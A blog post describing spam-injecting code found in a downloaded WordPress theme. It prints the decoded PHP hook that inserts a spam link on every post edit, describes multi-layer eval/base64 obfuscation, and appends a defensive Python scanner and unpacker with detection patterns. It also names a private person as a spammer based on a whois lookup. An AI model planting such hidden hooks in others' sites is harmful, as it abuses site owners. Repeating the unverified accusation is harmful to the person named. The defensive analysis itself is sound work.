Found - Wordpress Spam Virus in Theme files
Almost a month ago, I was helping my good buddy Beals get his Wordpress website set up. On looking closely, I noticed something a little weird in a theme he had found (NOT Wordpress proper, to be clear):
D-69-91-134-36:black-abstract-20 tjohnson$ ls -alh *
-rw-r--r--  1 tjohnson staff  528 2008-07-24 08:35 404.php
-rw-r--r--  1 tjohnson staff 3.9K 2008-07-24 08:35 comments.php
-rw-r--r--  1 tjohnson staff 8.0K 2008-10-22 20:44 footer.php
-rw-r--r--  1 tjohnson staff  871 2008-10-22 10:10 functions.php
[more removed here]
As you can see, the footer and functions files are both modified much more recently than every other file, which seemed strange to me. So I took a look at functions.php:
[some basic stuff removed]
eval(gzinflate(base64_decode('pZ..[much removed here, it was about 300 bytes].f1HKQRx+ecX+wY=')));
Hrmm… that doesn’t seem right. Why would someone base64 some stuff? (footer.php had a MUCH longer string, about 8 kilobytes.) I wrote a new file that printed the decoded string out instead of evaluating it, and got this (I edited the website out; they won’t get my link):
add_action("edit_post","insert_theme_link");
function insert_theme_link() {
	global $wpdb;
	if($wpdb->get_var("SELECT COUNT(link_id) FROM $wpdb->links WHERE link_url='http://nefariouswebsite.com/'")==0)
		wp_insert_link(array("link_name" => "Online University Courses", "link_url" => "http://nefariouswebsite.com/" ));
}
So this is a relatively well-behaved little Wordpress ‘virus’ (it /needs/ your website to stay running), but still pretty uncalled for, and impossible to remove without editing the code. More fundamentally, it would not have been hard to have the code do something more devious.
An analysis of the footer.php file ended up taking almost 70 base64 decodes (again!) to finally get to the meat of it, which ended up just being the footer attribution to the host of the (very dishonest) wordpress template repository that Beals found the theme at.
On a whim, I decided to whois the domain the link went to. Turns out it’s owned by someone in New Jersey named Douglas Petrie. One Douglas Petrie appears to write TV stuff; this cutie seems to write spamming programs, and has been since at least 2006: Spamhuntress: Doug Petrie’s domains in spamrun. And to think, I was going to politely ask him if he knew his company was doing this stuff. What a jerk.
In terms of positive lessons/actions to take out of this whole thing:
- Users: Don’t download themes from random places and run them if you don’t know what you’re doing.
- Wordpress Devs: Perhaps Wordpress should incorporate a quick scan/warning for eval statements? Sure, most people probably don’t read through their theme files closely enough to notice the code even if it was sitting in the open, but at least this way Wordpress could put a giant ‘Your theme is totally sketch, dude’ warning when you tried to use it.
How common is this sort of thing? I’ve seen a couple of these sorts of posts around, but not too many straight-out warnings about them. Also, a lot of them seem to revolve around plugins, not themes.
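Here is an added example, written in Python rather than PHP and not code from the original post, that does the two things this write-up calls for: a scanner that flags eval/gzinflate/base64_decode calls and long base64 literals in a theme’s .php files, and an unpacker that peels eval(gzinflate(base64_decode('...'))) and eval(base64_decode('...')) layers by decoding them offline instead of evaluating them, looping until no layer is left (the ~70-layer footer.php case) and stopping cleanly on a truncated or corrupt layer. The regexes, the function names and the wrap() helper that builds the constructed sample payload are all assumptions of this example; PHP’s gzinflate() is raw DEFLATE, which is what zlib decodes with wbits=-15.

```python
"""Offline unpacker and scanner for eval(gzinflate(base64_decode(...))) layers in PHP theme files.

Added example, not code from the original post. The regexes, function names and the
sample payload built by wrap() are constructed for illustration.
"""
import base64
import binascii
import re
import zlib
from pathlib import Path

# One obfuscation layer: eval( [gzinflate(] base64_decode('...') [)] )
LAYER_RE = re.compile(
    r"""eval\s*\(\s*(?P<inflate>gzinflate\s*\(\s*)?base64_decode\s*\(\s*
        (?P<q>['"])(?P<b64>[A-Za-z0-9+/=\s]*)(?P=q)\s*\)\s*(?(inflate)\)\s*)\)""",
    re.VERBOSE,
)
# Calls that are rare in an honest theme and worth a human look: indicators, not proof.
SUSPICIOUS_RE = re.compile(r"\b(eval|gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(")
LONG_B64_RE = re.compile(r"""['"][A-Za-z0-9+/=]{200,}['"]""")


def decode_layer(match):
    """Decode one matched layer without executing it (PHP gzinflate == raw DEFLATE)."""
    raw = base64.b64decode("".join(match.group("b64").split()), validate=True)
    if match.group("inflate"):
        raw = zlib.decompress(raw, -15)  # wbits=-15: raw deflate, no zlib/gzip header
    return raw.decode("utf-8", errors="replace")


def unwrap(src, max_layers=500):
    """Peel eval layers until none remain. Returns (source, layers_removed, status)."""
    layers = 0
    while layers < max_layers:
        m = LAYER_RE.search(src)
        if m is None:
            return src, layers, "ok"
        try:
            body = decode_layer(m)
        except (binascii.Error, zlib.error) as exc:
            return src, layers, f"stopped at layer {layers + 1}: {exc}"
        # Splice the decoded body in place of the eval(...) call so surrounding code is kept.
        src = src[:m.start()] + body + src[m.end():]
        layers += 1
    return src, layers, "stopped: max_layers reached"


def scan_source(name, src):
    """Return (file, line, indicator) tuples for suspicious constructs in one PHP source."""
    findings = []
    for lineno, line in enumerate(src.splitlines(), 1):
        for m in SUSPICIOUS_RE.finditer(line):
            findings.append((name, lineno, m.group(1)))
        if LONG_B64_RE.search(line):
            findings.append((name, lineno, "long base64 literal"))
    return findings


def scan_theme_dir(root):
    """Scan every .php file under a theme directory (e.g. wp-content/themes/<theme>)."""
    findings = []
    for path in sorted(Path(root).rglob("*.php")):
        findings.extend(scan_source(str(path), path.read_text(errors="replace")))
    return findings


def wrap(payload, layers, inflate=True):
    """Build a CONSTRUCTED sample: wrap payload in `layers` eval(...) layers like the theme did."""
    src = payload
    for _ in range(layers):
        data = src.encode()
        if inflate:
            c = zlib.compressobj(9, zlib.DEFLATED, -15)  # raw deflate, as PHP gzdeflate() emits
            data = c.compress(data) + c.flush()
        b64 = base64.b64encode(data).decode()
        src = (f"eval(gzinflate(base64_decode('{b64}')));" if inflate
               else f"eval(base64_decode('{b64}'));")
    return src


if __name__ == "__main__":
    # Constructed stand-in for footer.php: a benign payload under 70 layers, as the post describes.
    sample = "<?php\n" + wrap("echo 'constructed footer credit';", 70) + "\n?>"
    for finding in scan_source("footer.php", sample):
        print("indicator:", finding)
    body, n, status = unwrap(sample)
    print(f"{n} layers removed ({status}):\n{body}")
```

On a real install, run scan_theme_dir("wp-content/themes/<theme>") first, then feed each flagged file to unwrap() and read the result as text; nothing here ever evaluates the decoded code, which is the whole point of printing it out instead of running it.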
EDIT: Also, nefariouswebsite.com would be awesome to own.